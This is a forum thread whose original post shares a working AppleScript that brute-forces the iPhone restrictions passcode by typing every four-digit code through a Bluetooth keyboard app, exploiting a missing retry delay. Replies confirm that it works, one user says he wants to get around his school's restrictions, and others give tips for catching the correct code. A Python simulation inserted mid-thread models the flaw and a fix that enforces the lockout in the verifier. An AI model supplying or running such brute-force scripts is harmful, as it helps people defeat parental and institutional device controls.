
russellelly (macrumors regular, original poster; joined Jun 23, 2006; Glasgow, UK)
Hi,

I've found a vulnerability in iOS 6.1.2 on an iPhone 4S (probably there in other versions and for other iPhones/iPads/iPod Touches) that will allow you to brute force the restrictions passcode. The explanation is in a video at http://www.youtube.com/watch?v=dgvIdIScG0c ; below is some really simple AppleScript that I have written to exploit the vulnerability.

The gist of the solution is that iOS usually enforces a delay before re-entering a restrictions passcode after a number of failed attempts, but this is not enforced when using a bluetooth keyboard.

Enjoy!

Code:
-- Author Chris Russell
-- This script is designed to brute force the restrictions passcode on iPhone
-- Assumptions:
--   Bluetooth is enabled
--   Type2Phone App is running and connected to your phone (avail on Mac App Store)
--   iPhone is switched on and on the restrictions passcode screen (General - Restrictions)
--
-- Every candidate is typed as four digits with leading zeros; iOS submits the
-- code as soon as the fourth digit arrives, so no Return key is needed.
-- Each candidate is also written to the Script Editor log, so the last code
-- tried (or the one on screen when the phone unlocked) can be read back later.

-- First candidate to try. Raise this (e.g. 2000) to resume a run that has
-- already covered the lower codes.
property startPin : 0

-- Return n (0-9999) as four-digit, zero-padded text, e.g. 42 -> "0042"
on padPin(n)
	set padded to "000" & (n as text)
	return text -4 thru -1 of padded
end padPin

-- Type one candidate through the connected Bluetooth keyboard, then give the
-- phone a second to process it and clear the field
on tryPin(pinText)
	tell application "System Events" to keystroke pinText
	delay 1
end tryPin

-- Raw Apple event that forces scripting additions to load; a common workaround
-- for scripts that fail on first run
try
	«event ascrgdut»
end try

-- main application, simple ;)
tell application "Type2Phone" to activate
repeat with candidate from startPin to 9999
	set pinText to padPin(candidate)
	log pinText
	tryPin(pinText)
end repeat
 
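The flaw the post describes is a throttle that lives in one input path rather than in the verifier. The Python model below is an added example, not Apple's code and not the poster's script: it places the same lockout timer either in the touchscreen path only (reproducing the Bluetooth-keyboard bypass) or inside the verification routine, then runs the script's sequential 0000-9999 search against both designs over a simulated clock. The class and function names, the secret 0042, the one second per attempt (the script's `delay 1`) and the backoff schedule (no delay for the first four failures, then 60 s doubling up to a one-hour cap) are assumptions chosen for the model, not iOS's actual behaviour.

```python
"""Model of a 4-digit restrictions-passcode verifier with the lockout timer
placed either in the touchscreen UI path (the flaw in the thread) or in the
verifier itself (the fix).  Added example; not Apple's code.  The backoff
schedule and every name here are assumptions made for the model."""

from dataclasses import dataclass


def backoff_seconds(failures: int) -> float:
    """Lockout applied after the Nth consecutive failure.  Assumed schedule:
    no delay for the first four failures, then 60 s doubling to a 1 h cap."""
    if failures < 5:
        return 0.0
    return float(min(60 * 2 ** (failures - 5), 3600))


@dataclass
class RestrictionsPasscode:
    secret: str
    lock_in_core: bool         # False reproduces the flaw, True is the hardened design
    failures: int = 0
    locked_until: float = 0.0  # simulated clock, in seconds

    def _verify(self, guess: str, now: float) -> str:
        """The verification core.  Only the hardened design checks the timer here."""
        if self.lock_in_core and now < self.locked_until:
            return "locked"
        if guess == self.secret:
            self.failures = 0
            self.locked_until = 0.0
            return "ok"
        self.failures += 1
        self.locked_until = now + backoff_seconds(self.failures)
        return "wrong"

    def submit(self, guess: str, source: str, now: float) -> str:
        """Entry point for a typed code; source is 'touch' or 'keyboard'.
        In the flawed design only the on-screen keypad consults the timer, so a
        Bluetooth keyboard reaches _verify while the phone is 'locked'."""
        if source == "touch" and now < self.locked_until:
            return "locked"
        return self._verify(guess, now)


def brute_force(device: RestrictionsPasscode, source: str,
                seconds_per_attempt: float = 1.0, start: int = 0):
    """Try every code from start upward, in the order the AppleScript uses.
    A patient attacker waits out any lockout rather than bypassing it.
    Returns (code found or None, attempts made, simulated seconds elapsed)."""
    now = 0.0
    attempts = 0
    for n in range(start, 10000):
        candidate = f"{n:04d}"
        result = device.submit(candidate, source, now)
        if result == "locked":
            now = device.locked_until          # wait for the throttle to expire
            result = device.submit(candidate, source, now)
        attempts += 1
        now += seconds_per_attempt
        if result == "ok":
            return candidate, attempts, now
    return None, attempts, now


def compare(secret: str = "0042") -> dict:
    """Run the same attack against both designs and both input channels."""
    out = {}
    for design, lock_in_core in (("flawed", False), ("hardened", True)):
        for source in ("touch", "keyboard"):
            device = RestrictionsPasscode(secret, lock_in_core)
            out[(design, source)] = brute_force(device, source)
    return out


if __name__ == "__main__":
    for (design, source), (code, attempts, elapsed) in compare().items():
        print(f"{design:8s} {source:8s} code={code} attempts={attempts} "
              f"elapsed={elapsed / 3600:.1f} h")
```

Run directly to print all four rows. With the timer only in the touch path, the keyboard channel finds 0042 in 43 attempts and 43 simulated seconds; with the timer in the verification core, the same 43 guesses take about 33 simulated hours and the input channel no longer matters. The general rule the model illustrates: a lockout has to be enforced where the secret is compared, not where the digits are typed.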
I'm hoping this works, trying to get around my school's restrictions. I tried using a plist editor but since my iPad is encrypted I can only find the code if I paid $25.

Edit: I just watched your video and it seems very legit, but after a certain amount of failed attempts doesn't it lock you out, and the time grows after each wrong code?
 
Sorry for slow reply, didn't get a notification on your post :confused:

I've seen reports of a maximum 10 attempt restriction, but as you saw in the video it doesn't seem to exist. It _may_ be connected to the option 'Erase Data' under the 'Passcode Lock' settings, but I think this only applies to failed passcode lock attempts. Someone on the YouTube comments reports the script getting a 9999 code (the final one the script would try!), so it looks safe. As ever, backup first just in case :)
 
Russellelly, thank you so much for this script. It worked like a charm with Type2Phone to get me back in my iphone.

Folks, be sure to be in sight of your iPhone so you can have an idea of what the correct password was, since the script will continue to run. I missed it the first time so I ran the script again but changed it to start with 2000. In no time it guessed it right.

This saved me so much time since now I don't have to reinstall apps or configure all my settings.

Jerry
 
Other apps

Will this work with another keyboard app? I am asking because Type2Phone is a paid app and I am broke.
 
This is great, it worked for me. But I wasn't around when it did it so I never got the code. Is there a way to make it stop or highlight the correct combination?

I'm no good with script but I do very much appreciate you doing this, as I couldn't find the PIN with plist editor and I don't want to lose my contacts and notes restoring to new.

Any suggestions on how to narrow it down would be appreciated too
 
Record it while it's running and then play the video at 4x or even 8x until you find where it got the correct passcode.
 